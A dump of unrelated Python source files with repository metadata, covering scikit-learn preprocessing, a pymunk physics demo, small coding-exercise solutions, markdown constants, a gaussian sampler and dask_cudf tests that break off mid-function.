ace969d4f7d10db3c0750568fd46bab02504a765 | 4,808 | py | Python | cogspaces/preprocessing.py | arthurmensch/cogspaces | 497c5202405a85981f2bcddff0609d2af2acdbfd | [
"BSD-2-Clause"
] | 27 | 2017-11-01T21:01:56.000Z | 2022-03-28T22:36:31.000Z | cogspaces/preprocessing.py | arthurmensch/cogspaces | 497c5202405a85981f2bcddff0609d2af2acdbfd | [
"BSD-2-Clause"
] | 2 | 2018-09-11T18:47:03.000Z | 2019-08-08T14:17:33.000Z | cogspaces/preprocessing.py | arthurmensch/cogspaces | 497c5202405a85981f2bcddff0609d2af2acdbfd | [
"BSD-2-Clause"
] | 10 | 2017-11-12T20:55:58.000Z | 2021-05-11T22:09:39.000Z | """
Preprocessing helpers for multi-study input.
"""
import warnings
from typing import Dict
import pandas as pd
from sklearn.base import BaseEstimator, TransformerMixin
from sklearn.preprocessing import StandardScaler, LabelEncoder
warnings.filterwarnings('ignore', category=DeprecationWarning,
module=r'sklearn.preprocessing.label.*')
class MultiStandardScaler(BaseEstimator, TransformerMixin):
    """Fit one ``StandardScaler`` per study over a dict of datasets.

    Attributes
    ----------
    self.sc_: dict
        Maps each study name to the ``StandardScaler`` fitted on its data.
    """

    def fit(self, data):
        """Fit an independent scaler for every study and return ``self``."""
        self.sc_ = {study: StandardScaler().fit(values)
                    for study, values in data.items()}
        return self

    def transform(self, data):
        """Scale each study's data with its own fitted scaler."""
        return {study: self.sc_[study].transform(values)
                for study, values in data.items()}

    def inverse_transform(self, data):
        """Undo the per-study scaling."""
        return {study: self.sc_[study].inverse_transform(values)
                for study, values in data.items()}

    @property
    def scale_(self):
        """Per-study scale vectors of the fitted scalers."""
        return {study: sc.scale_ for study, sc in self.sc_.items()}

    @property
    def mean_(self):
        """Per-study mean vectors of the fitted scalers."""
        return {study: sc.mean_ for study, sc in self.sc_.items()}
class MultiTargetEncoder(BaseEstimator, TransformerMixin):
    """"
    Transformer that numericalize task fMRI data.
    """

    def fit(self, targets: Dict[str, pd.DataFrame]) -> 'MultiTargetEncoder':
        """
        Fit the target encoders necessary for dataframe numericalization.

        Parameters
        ----------
        targets : Dict[str, pd.DataFrame]
            Dictionary of dataframes associated to single studies. Each
            dataframe must contain
            the columns ['study', 'subject', 'contrast', 'study_contrast']

        Returns
        -------
        self: MultiTargetEncoder
        """
        self.le_ = {}
        # study_contrast/study encoders are shared across all studies so
        # their numeric codes agree between datasets; contrast/subject
        # encoders are fitted per study.
        study_contrasts = pd.concat([target['study_contrast']
                                     for target in targets.values()])
        studies = pd.concat([target['study'] for target in targets.values()])
        le_study_contrast = LabelEncoder().fit(study_contrasts)
        le_study = LabelEncoder().fit(studies)
        for study, target in targets.items():
            self.le_[study] = dict(
                contrast=LabelEncoder().fit(target['contrast']),
                subject=LabelEncoder().fit(target['subject']),
                study_contrast=le_study_contrast,
                study=le_study,
            )
        return self

    def transform(self, targets):
        """
        Transform named targets into numericalized targets.

        Columns without a fitted encoder are passed through unchanged.

        Parameters
        ----------
        targets : Dict[str, pd.DataFrame]
            Dictionary of dataframes associated to single studies. Each
            dataframe must contain
            the columns ['study', 'subject', 'contrast', 'study_contrast']

        Returns
        -------
        numericalized_targets: Dict[str, pd.DataFrame]
            Dictionary of dataframes associated to single studies,
            where each column is numericalized.
        """
        res = {}
        for study, target in targets.items():
            d = self.le_[study]
            res[study] = target.apply(
                lambda x: d[x.name].transform(x) if x.name in d else x)
        return res

    def inverse_transform(self, targets):
        """
        Transform numericalized targets into named targets.

        Parameters
        ----------
        targets: Dict[str, pd.DataFrame]
            Dictionary of dataframes associated to single studies,
            where each column is numericalized. Each dataframe must contain
            the columns ['study', 'subject', 'contrast', 'study_contrast']

        Returns
        -------
        named_targets : Dict[str, pd.DataFrame]
            Dictionary of dataframes associated to single studies. Each
            dataframe must contain
            the columns ['study', 'subject', 'contrast', 'study_contrast']
        """
        res = {}
        for study, target in targets.items():
            d = self.le_[study]
            # BUG FIX: mirror transform()'s guard so columns without a fitted
            # encoder pass through instead of raising KeyError.
            res[study] = target.apply(
                lambda x: d[x.name].inverse_transform(x) if x.name in d else x)
        return res

    @property
    def classes_(self):
        """
        Returns
        -------
        classes_: Dict[List[str]]
            Dictionary of classes list for the contrast `target_encoder`.
        """
        return {study: le['contrast'].classes_ for study, le in
                self.le_.items()}
| 31.424837 | 107 | 0.596506 |
ace96b02b217955f086084c5da9b8deeabc52725 | 4,755 | py | Python | examples/deformable.py | conductiveIT/pymunk-1 | 61de8b2e652503356ac14a2d648cc11aa6a8070f | [
"MIT"
] | 670 | 2015-01-01T19:10:15.000Z | 2022-03-29T23:05:47.000Z | examples/deformable.py | reter695/pymunk | 9e9d3bf14cd57f61006588b1c56fefc21b453733 | [
"MIT"
] | 122 | 2015-01-02T19:06:19.000Z | 2022-03-20T19:44:25.000Z | examples/deformable.py | reter695/pymunk | 9e9d3bf14cd57f61006588b1c56fefc21b453733 | [
"MIT"
] | 222 | 2015-01-28T03:34:52.000Z | 2022-03-27T06:44:52.000Z | """This is an example on how the autogeometry can be used for deformable
terrain.
"""
__docformat__ = "reStructuredText"
import sys
import pygame
import pymunk
import pymunk.autogeometry
import pymunk.pygame_util
from pymunk import BB
def draw_helptext(screen):
    """Blit the keyboard/mouse help lines into the top-left of *screen*."""
    font = pygame.font.Font(None, 16)
    help_lines = (
        "LMB(hold): Draw pink color",
        "LMB(hold) + Shift: Create balls",
        "g: Generate segments from pink color drawing",
        "r: Reset",
    )
    # Lines are stacked 10 px apart, starting at y=5.
    for row, line in enumerate(help_lines):
        rendered = font.render(line, 1, pygame.Color("black"))
        screen.blit(rendered, (5, 5 + row * 10))
def generate_geometry(surface, space):
    """Rebuild the terrain segments in *space* from the pixels of *surface*.

    Segments created by a previous call (tagged with ``generated``) are
    removed, then ``march_soft`` traces the lightness iso-line of the
    surface and the simplified polylines are added back as static
    segments.
    """
    # Drop terrain produced by an earlier call.
    for stale in space.shapes:
        if getattr(stale, "generated", False):
            space.remove(stale)
    def sample_func(point):
        # Lightness of the pixel under `point`; 0 on any lookup failure
        # (e.g. out-of-bounds coordinates).
        try:
            pixel = int(point[0]), int(point[1])
            return surface.get_at(pixel).hsla[2]  # use lightness
        except Exception as exc:
            print(exc)
            return 0
    line_set = pymunk.autogeometry.march_soft(
        BB(0, 0, 599, 599), 60, 60, 90, sample_func
    )
    for polyline in line_set:
        simplified = pymunk.autogeometry.simplify_curves(polyline, 1.0)
        # Consecutive vertex pairs become individual static segments.
        for start, end in zip(simplified, simplified[1:]):
            segment = pymunk.Segment(space.static_body, start, end, 1)
            segment.friction = 0.5
            segment.color = pygame.Color("red")
            segment.generated = True
            space.add(segment)
def main():
    """Run the interactive deformable-terrain demo (blocks in its own loop)."""
    pygame.init()
    screen = pygame.display.set_mode((600, 600))
    clock = pygame.time.Clock()
    space = pymunk.Space()
    # +y points down-screen here (positive_y_is_up is set False below).
    space.gravity = 0, 980
    # Border walls just outside the visible area; collision_type 1 marks
    # them so the pre_solve handler below can recognise wall contacts.
    static = [
        pymunk.Segment(space.static_body, (0, -50), (-50, 650), 5),
        pymunk.Segment(space.static_body, (0, 650), (650, 650), 5),
        pymunk.Segment(space.static_body, (650, 650), (650, -50), 5),
        pymunk.Segment(space.static_body, (-50, -50), (650, -50), 5),
    ]
    for s in static:
        s.collision_type = 1
    space.add(*static)
    def pre_solve(arb, space, data):
        # Handler is registered for types (0, 1), so shapes[0] is the
        # non-wall shape: remove it (and its body) and reject the collision.
        s = arb.shapes[0]
        space.remove(s.body, s)
        return False
    space.add_collision_handler(0, 1).pre_solve = pre_solve
    # The pink drawing lives on this off-screen surface; its lightness is
    # what generate_geometry samples to build terrain segments.
    terrain_surface = pygame.Surface((600, 600))
    terrain_surface.fill(pygame.Color("white"))
    color = pygame.color.THECOLORS["pink"]
    pygame.draw.circle(terrain_surface, color, (450, 120), 100)
    generate_geometry(terrain_surface, space)
    # Drop 25 balls at the centre of the initial pink circle.
    for x in range(25):
        mass = 1
        moment = pymunk.moment_for_circle(mass, 0, 10)
        body = pymunk.Body(mass, moment)
        body.position = 450, 120
        shape = pymunk.Circle(body, 10)
        shape.friction = 0.5
        space.add(body, shape)
    draw_options = pymunk.pygame_util.DrawOptions(screen)
    pymunk.pygame_util.positive_y_is_up = False
    fps = 60
    while True:
        for event in pygame.event.get():
            # Quit on window close, Escape, or 'q'.
            if (
                event.type == pygame.QUIT
                or event.type == pygame.KEYDOWN
                and (event.key in [pygame.K_ESCAPE, pygame.K_q])
            ):
                sys.exit(0)
            elif event.type == pygame.MOUSEBUTTONDOWN and event.button == 3:
                pass
            elif event.type == pygame.KEYDOWN and event.key == pygame.K_r:
                # 'r': reset — wipe the drawing and remove generated terrain.
                terrain_surface.fill(pygame.Color("white"))
                for s in space.shapes:
                    if hasattr(s, "generated") and s.generated:
                        space.remove(s)
            elif event.type == pygame.KEYDOWN and event.key == pygame.K_g:
                # 'g': regenerate terrain from the current drawing.
                generate_geometry(terrain_surface, space)
            elif event.type == pygame.KEYDOWN and event.key == pygame.K_p:
                # 'p': screenshot.
                pygame.image.save(screen, "deformable.png")
        if pygame.mouse.get_pressed()[0]:
            if pygame.key.get_mods() & pygame.KMOD_SHIFT:
                # Shift + LMB: spawn a ball at the cursor.
                mass = 1
                moment = pymunk.moment_for_circle(mass, 0, 10)
                body = pymunk.Body(mass, moment)
                body.position = pygame.mouse.get_pos()
                shape = pymunk.Circle(body, 10)
                shape.friction = 0.5
                space.add(body, shape)
            else:
                # Plain LMB: paint pink onto the terrain surface.
                color = pygame.Color("pink")
                pos = pygame.mouse.get_pos()
                pygame.draw.circle(terrain_surface, color, pos, 25)
        space.step(1.0 / fps)
        # Redraw: background, terrain drawing, physics debug, help text.
        screen.fill(pygame.Color("white"))
        screen.blit(terrain_surface, (0, 0))
        space.debug_draw(draw_options)
        draw_helptext(screen)
        pygame.display.flip()
        clock.tick(fps)
        pygame.display.set_caption("fps: " + str(clock.get_fps()))
# Entry point. main() never returns normally — it exits via sys.exit(0)
# inside its event loop — so sys.exit(main()) here is just belt-and-braces.
if __name__ == "__main__":
    sys.exit(main())
| 30.677419 | 76 | 0.569506 |
ace96b29847d94e0ad359533ffc8ada9431b620b | 140 | py | Python | modules/import_specific_attributes.py | magicalcarpet/the_complete_python_course | 0ac0c5015a93607d7d29258ac0a3fc38dda81bd2 | [
"MIT"
] | null | null | null | modules/import_specific_attributes.py | magicalcarpet/the_complete_python_course | 0ac0c5015a93607d7d29258ac0a3fc38dda81bd2 | [
"MIT"
] | null | null | null | modules/import_specific_attributes.py | magicalcarpet/the_complete_python_course | 0ac0c5015a93607d7d29258ac0a3fc38dda81bd2 | [
"MIT"
] | null | null | null | from calculator import creator, add, subtract
from math import sqrt
# Demo: use the names brought in with `from ... import ...`.
print(creator)  # name imported from the local `calculator` module
print(add(2, 5))
print(subtract(10, 3))
print(sqrt(49))  # math.sqrt -> prints 7.0
| 17.5 | 45 | 0.75 |
ace96b876a6dad71c43c5a32c2f87fb6d2f15ad0 | 232 | py | Python | Intro/Land of Logic/validTime.py | shanemichaelarcaro/codesignal | 69b0460dbc163091dc115634bbb730da5caf65a9 | [
"MIT"
] | null | null | null | Intro/Land of Logic/validTime.py | shanemichaelarcaro/codesignal | 69b0460dbc163091dc115634bbb730da5caf65a9 | [
"MIT"
] | null | null | null | Intro/Land of Logic/validTime.py | shanemichaelarcaro/codesignal | 69b0460dbc163091dc115634bbb730da5caf65a9 | [
"MIT"
def validTime(time):
    """Return True when *time* is a valid 24-hour clock string "HH:MM".

    Hours run 00-23 and minutes run 00-59.  The previous lower bound of
    1 on the minutes wrongly rejected on-the-hour times such as "13:00".
    """
    parts = time.split(":")
    return 0 <= int(parts[0]) <= 23 and 0 <= int(parts[1]) <= 59
print(validTime("13:58")) # => True
print(validTime("25:51")) # => False
print(validTime("02:78")) # => False
| 19.333333 | 62 | 0.551724 |
ace96da63e730c6828460fced8737fd5074392b8 | 612 | py | Python | mdgen/constants.py | saisiddhant12/python-random-markdown-generator | a1a581beddb26edabb3173f60e7317471711c2d3 | [
"Apache-2.0"
] | 7 | 2020-10-08T12:54:47.000Z | 2021-09-19T11:15:05.000Z | mdgen/constants.py | saisiddhant12/python-random-markdown-generator | a1a581beddb26edabb3173f60e7317471711c2d3 | [
"Apache-2.0"
] | 8 | 2020-09-30T11:38:54.000Z | 2021-02-25T01:12:31.000Z | mdgen/constants.py | saisiddhant12/python-random-markdown-generator | a1a581beddb26edabb3173f60e7317471711c2d3 | [
"Apache-2.0"
] | 9 | 2020-10-01T06:28:45.000Z | 2021-06-05T14:58:33.000Z | from os import linesep
# Markdown syntax tokens (module-wide constants).
# Headings: '#' prefix form, '-' as the alternate (underline) form.
MARKDOWN_HEADER = '#'
MARKDOWN_HEADER_ALT = '-'
# Whitespace building blocks.
LINESEPARATOR = linesep
INDENTATION = '\t'
# Emphasis markers.
MARKDOWN_BOLD = '**'
MARKDOWN_ITALIC = '*'
MARKDOWN_ITALIC_ALT = '_'
# Horizontal rules — three interchangeable spellings.
MARKDOWN_HORIZONTAL_RULE_HYPHENS = '---'
MARKDOWN_HORIZONTAL_RULE_ASTERISKS = '***'
MARKDOWN_HORIZONTAL_RULE_UNDERSCORES = '___'
# Unordered-list bullets — three interchangeable spellings.
MARKDOWN_UNORDERED_LISTS_ASTERISKS = '*'
MARKDOWN_UNORDERED_LISTS_MINUS = '-'
MARKDOWN_UNORDERED_LISTS_PLUS = '+'
# Table delimiters.
MARKDOWN_TABLE_COL_SEPARATOR = '|'
MARKDOWN_TABLE_ROW_SEPARATOR = '-'
# HTML-style comments.
MARKDOWN_COMMENT_OPEN = '<!--'
MARKDOWN_COMMENT_CLOSE = '-->'
# Fenced code blocks and blockquotes.
MARKDOWN_CODEBLOCK = '```'
MARKDOWN_BLOCKQUOTE = '>'
| 27.818182 | 44 | 0.763072 |
ace96e7432f8b214a9afe7b7204789ba560bc72c | 1,388 | py | Python | problemset/540.py | frankpiva/leetcode | 85540af1fd72ad9e92c5a6ad253b1aaeec5065d9 | [
"MIT"
] | null | null | null | problemset/540.py | frankpiva/leetcode | 85540af1fd72ad9e92c5a6ad253b1aaeec5065d9 | [
"MIT"
] | null | null | null | problemset/540.py | frankpiva/leetcode | 85540af1fd72ad9e92c5a6ad253b1aaeec5065d9 | [
"MIT"
] | null | null | null | """
540. Single Element in a Sorted Array
Medium
3934
98
Add to List
Share
You are given a sorted array consisting of only integers where every element appears exactly twice, except for one element which appears exactly once.
Return the single element that appears only once.
Your solution must run in O(log n) time and O(1) space.
Example 1:
Input: nums = [1,1,2,3,3,4,4,8,8]
Output: 2
Example 2:
Input: nums = [3,3,7,7,10,11,11]
Output: 10
Constraints:
1 <= nums.length <= 10^5
0 <= nums[i] <= 10^5
"""
class Solution:
    def singleNonDuplicate(self, nums: List[int]) -> int:
        """Return the value appearing exactly once in a sorted pairs array.

        Binary search on pair alignment: every element except one appears
        twice, so to the left of the single element each pair ends on an
        odd index, and the alignment flips to its right.  O(log n) time,
        O(1) space.
        """
        lo, hi = 0, len(nums) - 1
        probe = 0  # last midpoint inspected (used by the overshoot fix-up)
        while lo < hi:
            probe = (lo + hi + 1) // 2  # upper midpoint
            matches_previous = nums[probe] == nums[probe - 1]
            if probe % 2 == 0:
                # Even probe paired with its left neighbour means the
                # single element lies to the left; otherwise keep probe.
                if matches_previous:
                    hi = probe - 2
                else:
                    lo = probe
            elif matches_previous:
                # Odd probe completing a pair: alignment intact, go right.
                lo = probe + 1
            else:
                hi = probe - 1
        # lo == hi pinpoints the answer; otherwise the halving overshot
        # and the element just right of the last probe is the single one.
        return nums[lo] if lo == hi else nums[probe + 1]
| 22.754098 | 150 | 0.542507 |
ace96fbb8e27d0e758d72d5c02732c9ee286721f | 2,913 | py | Python | schedulemanager/schedules/customFunctions.py | NumaKarolinski/schedule_web_app | 260f9203787a3273094f2149ac6e2adc7d46abcf | [
"MIT"
] | null | null | null | schedulemanager/schedules/customFunctions.py | NumaKarolinski/schedule_web_app | 260f9203787a3273094f2149ac6e2adc7d46abcf | [
"MIT"
] | null | null | null | schedulemanager/schedules/customFunctions.py | NumaKarolinski/schedule_web_app | 260f9203787a3273094f2149ac6e2adc7d46abcf | [
"MIT"
] | null | null | null | import math as m
import numpy as np
import random as r
def cpdf(sigmas_from_bound):
    """Standard-normal cumulative distribution Phi(x), via the error function."""
    z = sigmas_from_bound / m.sqrt(2)
    return (1 + m.erf(z)) / 2
def generate_gaussian(nn_n_1, nn_n_2, n, n_more, n_less, available):
    """Sample a random duration (in minutes) around the mean *n*.

    Draws from a two-sided (piecewise) Gaussian whose left/right halves
    have different sigmas derived from *n_less* / *n_more*, rejection-
    sampling until the value falls strictly inside (lower_bound,
    upper_bound).  The nn_n_1 / nn_n_2 flags and *available* choose the
    bounds.  Returns a float (or *n* itself when both bounds collapse
    onto the mean).

    NOTE(review): the sampling looks like a Box-Muller transform
    (sqrt(-2 ln u) * cos(2 pi v)) combined with side-selection on the
    same uniform draw `roo` — confirm the intended distribution.
    """
    # Pick the hard lower clip for the sample.
    if nn_n_1:
        if n == n_less:
            lower_bound = n_less
        else:
            lower_bound = 0
    else:
        lower_bound = n_less
    # Pick the hard upper clip, capped by the available minutes.
    if nn_n_2:
        if n == n_more:
            upper_bound = n_more
        else:
            upper_bound = available
    else:
        if available < n_more:
            upper_bound = available
        else:
            upper_bound = n_more
    # both values are in minutes, they are the upper and lower sigma
    # for the piecewise Gaussian (left and right half of Gaussian)
    # lower_sigma_in_minutes is negative because it's less than the mean
    # n_less and n_more are -2*sigma_lower and 2*sigma_upper,
    # respectively, so l_b_s_f_m <= 0, and u_b_s_f_m >= 0
    lower_sigma_in_minutes = (n_less - n) / 2
    upper_sigma_in_minutes = (n_more - n) / 2
    # Degenerate case: no room on either side of the mean.
    if lower_bound == n and upper_bound == n:
        return n
    elif upper_bound == n:
        # Only the left half can produce values: force the lower side.
        upper_bound_sigmas_from_mean = 0
        lower_bound_sigmas_from_mean = (
            n - lower_bound) / lower_sigma_in_minutes
        threshold = 1
        fl = 1
        fm = 0
    elif lower_bound == n:
        # Only the right half can produce values: force the upper side.
        upper_bound_sigmas_from_mean = (
            upper_bound - n) / upper_sigma_in_minutes
        lower_bound_sigmas_from_mean = 0
        threshold = 1
        fl = 0
        fm = 1
    else:
        # General case: fl / fm are the probability masses between the
        # mean and each bound (via the normal CDF); `threshold` later
        # biases which side a draw is accepted on.
        lower_bound_sigmas_from_mean = (
            n - lower_bound) / lower_sigma_in_minutes
        upper_bound_sigmas_from_mean = (
            upper_bound - n) / upper_sigma_in_minutes
        fl = 0.5 - cpdf(lower_bound_sigmas_from_mean)
        fm = cpdf(upper_bound_sigmas_from_mean) - 0.5
        if (-1 * lower_bound_sigmas_from_mean) <= upper_bound_sigmas_from_mean:
            threshold = fl / fm
        else:
            threshold = fm / fl
    # Rejection loop: keep drawing until a sample lands inside the bounds.
    # `valid_value` is never set True — the loop only exits via return.
    valid_value = False
    while not valid_value:
        ro = r.random()
        roo = r.random()
        rooo = r.random()
        # `roo` does double duty: it selects the side (outer quartiles ->
        # upper half) and feeds the cos() term of the transform below.
        if (roo < 0.25) or (roo >= 0.75):
            if upper_bound == n:
                pass
            else:
                if (fm > fl and rooo <= threshold) or (fm <= fl):
                    x_m = upper_sigma_in_minutes * \
                        np.sqrt(2 * (-np.log(1 - ro))) * \
                        np.cos(2 * np.pi * roo) + n
                    if x_m < upper_bound:
                        return x_m
        else:
            # NOTE(review): unlike the upper branch, there is no `else`
            # after this guard, so when lower_bound == n a lower-side
            # sample is still computed and always rejected (wasted work,
            # but same observable behaviour) — confirm intent.
            if lower_bound == n:
                pass
            if (fm < fl and rooo <= threshold) or (fm >= fl):
                x_l = -lower_sigma_in_minutes * \
                    np.sqrt(2 * (-np.log(1 - ro))) * \
                    np.cos(2 * np.pi * roo) + n
                if x_l > lower_bound:
                    return x_l
| 28.009615 | 79 | 0.534157 |
ace9701b67736731ac85173437e736fb453a33b8 | 24,054 | py | Python | python/dask_cudf/dask_cudf/tests/test_core.py | gdaisukesuzuki/cudf | aa5c8b686b1513dba7bce168200c1259f1eda908 | [
"Apache-2.0"
] | 4,012 | 2018-10-29T00:11:19.000Z | 2022-03-31T19:20:19.000Z | python/dask_cudf/dask_cudf/tests/test_core.py | gdaisukesuzuki/cudf | aa5c8b686b1513dba7bce168200c1259f1eda908 | [
"Apache-2.0"
] | 9,865 | 2018-10-29T12:52:07.000Z | 2022-03-31T23:09:21.000Z | python/dask_cudf/dask_cudf/tests/test_core.py | gdaisukesuzuki/cudf | aa5c8b686b1513dba7bce168200c1259f1eda908 | [
"Apache-2.0"
] | 588 | 2018-10-29T05:52:44.000Z | 2022-03-28T06:13:09.000Z | # Copyright (c) 2021, NVIDIA CORPORATION.
import random
import cupy as cp
import numpy as np
import pandas as pd
import pytest
import dask
from dask import dataframe as dd
from dask.dataframe.core import make_meta as dask_make_meta, meta_nonempty
from dask.utils import M
import cudf
import dask_cudf as dgd
def test_from_cudf():
np.random.seed(0)
df = pd.DataFrame(
{
"x": np.random.randint(0, 5, size=10000),
"y": np.random.normal(size=10000),
}
)
gdf = cudf.DataFrame.from_pandas(df)
# Test simple around to/from dask
ingested = dd.from_pandas(gdf, npartitions=2)
dd.assert_eq(ingested, df)
# Test conversion to dask.dataframe
ddf = ingested.to_dask_dataframe()
dd.assert_eq(ddf, df)
def test_from_cudf_multiindex_raises():
df = cudf.DataFrame({"x": list("abc"), "y": [1, 2, 3], "z": [1, 2, 3]})
with pytest.raises(NotImplementedError):
# dask_cudf does not support MultiIndex yet
dgd.from_cudf(df.set_index(["x", "y"]))
def test_from_cudf_with_generic_idx():
cdf = cudf.DataFrame(
{
"a": list(range(20)),
"b": list(reversed(range(20))),
"c": list(range(20)),
}
)
ddf = dgd.from_cudf(cdf, npartitions=2)
assert isinstance(ddf.index.compute(), cudf.RangeIndex)
dd.assert_eq(ddf.loc[1:2, ["a"]], cdf.loc[1:2, ["a"]])
def _fragmented_gdf(df, nsplit):
n = len(df)
# Split dataframe in *nsplit*
subdivsize = n // nsplit
starts = [i * subdivsize for i in range(nsplit)]
ends = starts[1:] + [None]
frags = [df[s:e] for s, e in zip(starts, ends)]
return frags
def test_query():
np.random.seed(0)
df = pd.DataFrame(
{"x": np.random.randint(0, 5, size=10), "y": np.random.normal(size=10)}
)
gdf = cudf.DataFrame.from_pandas(df)
expr = "x > 2"
dd.assert_eq(gdf.query(expr), df.query(expr))
queried = dd.from_pandas(gdf, npartitions=2).query(expr)
got = queried
expect = gdf.query(expr)
dd.assert_eq(got, expect)
def test_query_local_dict():
np.random.seed(0)
df = pd.DataFrame(
{"x": np.random.randint(0, 5, size=10), "y": np.random.normal(size=10)}
)
gdf = cudf.DataFrame.from_pandas(df)
ddf = dgd.from_cudf(gdf, npartitions=2)
val = 2
gdf_queried = gdf.query("x > @val")
ddf_queried = ddf.query("x > @val", local_dict={"val": val})
dd.assert_eq(gdf_queried, ddf_queried)
def test_head():
np.random.seed(0)
df = pd.DataFrame(
{
"x": np.random.randint(0, 5, size=100),
"y": np.random.normal(size=100),
}
)
gdf = cudf.DataFrame.from_pandas(df)
dgf = dd.from_pandas(gdf, npartitions=2)
dd.assert_eq(dgf.head(), df.head())
def test_from_dask_dataframe():
np.random.seed(0)
df = pd.DataFrame(
{"x": np.random.randint(0, 5, size=20), "y": np.random.normal(size=20)}
)
ddf = dd.from_pandas(df, npartitions=2)
dgdf = ddf.map_partitions(cudf.from_pandas)
got = dgdf.compute().to_pandas()
expect = df
dd.assert_eq(got, expect)
@pytest.mark.parametrize("nelem", [10, 200, 1333])
@pytest.mark.parametrize("divisions", [None, "quantile"])
def test_set_index(nelem, divisions):
with dask.config.set(scheduler="single-threaded"):
np.random.seed(0)
# Use unique index range as the sort may not be stable-ordering
x = np.arange(nelem)
np.random.shuffle(x)
df = pd.DataFrame(
{"x": x, "y": np.random.randint(0, nelem, size=nelem)}
)
ddf = dd.from_pandas(df, npartitions=2)
dgdf = ddf.map_partitions(cudf.from_pandas)
expect = ddf.set_index("x")
got = dgdf.set_index("x", divisions=divisions)
dd.assert_eq(expect, got, check_index=False, check_divisions=False)
@pytest.mark.parametrize("by", ["a", "b"])
@pytest.mark.parametrize("nelem", [10, 500])
@pytest.mark.parametrize("nparts", [1, 10])
def test_set_index_quantile(nelem, nparts, by):
df = cudf.DataFrame()
df["a"] = np.ascontiguousarray(np.arange(nelem)[::-1])
df["b"] = np.random.choice(cudf.datasets.names, size=nelem)
ddf = dd.from_pandas(df, npartitions=nparts)
got = ddf.set_index(by, divisions="quantile")
expect = df.sort_values(by=by).set_index(by)
dd.assert_eq(got, expect)
def assert_frame_equal_by_index_group(expect, got):
assert sorted(expect.columns) == sorted(got.columns)
assert sorted(set(got.index)) == sorted(set(expect.index))
# Note the set_index sort is not stable,
unique_values = sorted(set(got.index))
for iv in unique_values:
sr_expect = expect.loc[[iv]]
sr_got = got.loc[[iv]]
for k in expect.columns:
# Sort each column before we compare them
sorted_expect = sr_expect.sort_values(k)[k]
sorted_got = sr_got.sort_values(k)[k]
np.testing.assert_array_equal(sorted_expect, sorted_got)
@pytest.mark.parametrize("nelem", [10, 200, 1333])
def test_set_index_2(nelem):
with dask.config.set(scheduler="single-threaded"):
np.random.seed(0)
df = pd.DataFrame(
{
"x": 100 + np.random.randint(0, nelem // 2, size=nelem),
"y": np.random.normal(size=nelem),
}
)
expect = df.set_index("x").sort_index()
dgf = dd.from_pandas(cudf.DataFrame.from_pandas(df), npartitions=4)
res = dgf.set_index("x") # sort by default
got = res.compute().to_pandas()
assert_frame_equal_by_index_group(expect, got)
@pytest.mark.xfail(reason="dask's index name '__dask_cudf.index' is correct")
def test_set_index_w_series():
with dask.config.set(scheduler="single-threaded"):
nelem = 20
np.random.seed(0)
df = pd.DataFrame(
{
"x": 100 + np.random.randint(0, nelem // 2, size=nelem),
"y": np.random.normal(size=nelem),
}
)
expect = df.set_index(df.x).sort_index()
dgf = dd.from_pandas(cudf.DataFrame.from_pandas(df), npartitions=4)
res = dgf.set_index(dgf.x) # sort by default
got = res.compute().to_pandas()
dd.assert_eq(expect, got)
def test_set_index_sorted():
with dask.config.set(scheduler="single-threaded"):
df1 = pd.DataFrame({"val": [4, 3, 2, 1, 0], "id": [0, 1, 3, 5, 7]})
ddf1 = dd.from_pandas(df1, npartitions=2)
gdf1 = cudf.from_pandas(df1)
gddf1 = dgd.from_cudf(gdf1, npartitions=2)
expect = ddf1.set_index("id", sorted=True)
got = gddf1.set_index("id", sorted=True)
dd.assert_eq(expect, got)
with pytest.raises(ValueError):
# Cannot set `sorted=True` for non-sorted column
gddf1.set_index("val", sorted=True)
@pytest.mark.parametrize("nelem", [10, 200, 1333])
@pytest.mark.parametrize("index", [None, "myindex"])
def test_rearrange_by_divisions(nelem, index):
with dask.config.set(scheduler="single-threaded"):
np.random.seed(0)
df = pd.DataFrame(
{
"x": np.random.randint(0, 20, size=nelem),
"y": np.random.normal(size=nelem),
"z": np.random.choice(["dog", "cat", "bird"], nelem),
}
)
df["z"] = df["z"].astype("category")
ddf1 = dd.from_pandas(df, npartitions=4)
gdf1 = dgd.from_cudf(cudf.DataFrame.from_pandas(df), npartitions=4)
ddf1.index.name = index
gdf1.index.name = index
divisions = (0, 2, 4, 6, 8, 10, 12, 14, 16, 18, 20)
expect = dd.shuffle.rearrange_by_divisions(
ddf1, "x", divisions=divisions, shuffle="tasks"
)
result = dd.shuffle.rearrange_by_divisions(
gdf1, "x", divisions=divisions, shuffle="tasks"
)
dd.assert_eq(expect, result)
def test_assign():
np.random.seed(0)
df = pd.DataFrame(
{"x": np.random.randint(0, 5, size=20), "y": np.random.normal(size=20)}
)
dgf = dd.from_pandas(cudf.DataFrame.from_pandas(df), npartitions=2)
pdcol = pd.Series(np.arange(20) + 1000)
newcol = dd.from_pandas(cudf.Series(pdcol), npartitions=dgf.npartitions)
got = dgf.assign(z=newcol)
dd.assert_eq(got.loc[:, ["x", "y"]], df)
np.testing.assert_array_equal(got["z"].compute().to_array(), pdcol)
@pytest.mark.parametrize("data_type", ["int8", "int16", "int32", "int64"])
def test_setitem_scalar_integer(data_type):
np.random.seed(0)
scalar = np.random.randint(0, 100, dtype=data_type)
df = pd.DataFrame(
{"x": np.random.randint(0, 5, size=20), "y": np.random.normal(size=20)}
)
dgf = dd.from_pandas(cudf.DataFrame.from_pandas(df), npartitions=2)
df["z"] = scalar
dgf["z"] = scalar
got = dgf.compute().to_pandas()
np.testing.assert_array_equal(got["z"], df["z"])
@pytest.mark.parametrize("data_type", ["float32", "float64"])
def test_setitem_scalar_float(data_type):
np.random.seed(0)
scalar = np.random.randn(1).astype(data_type)[0]
df = pd.DataFrame(
{"x": np.random.randint(0, 5, size=20), "y": np.random.normal(size=20)}
)
dgf = dd.from_pandas(cudf.DataFrame.from_pandas(df), npartitions=2)
df["z"] = scalar
dgf["z"] = scalar
got = dgf.compute().to_pandas()
np.testing.assert_array_equal(got["z"], df["z"])
def test_setitem_scalar_datetime():
np.random.seed(0)
scalar = np.int64(np.random.randint(0, 100)).astype("datetime64[ms]")
df = pd.DataFrame(
{"x": np.random.randint(0, 5, size=20), "y": np.random.normal(size=20)}
)
dgf = dd.from_pandas(cudf.DataFrame.from_pandas(df), npartitions=2)
df["z"] = scalar
dgf["z"] = scalar
got = dgf.compute().to_pandas()
np.testing.assert_array_equal(got["z"], df["z"])
@pytest.mark.parametrize(
"func",
[
lambda: pd._testing.makeDataFrame().reset_index(),
pd._testing.makeDataFrame,
pd._testing.makeMixedDataFrame,
pd._testing.makeObjectSeries,
pd._testing.makeTimeSeries,
],
)
def test_repr(func):
pdf = func()
try:
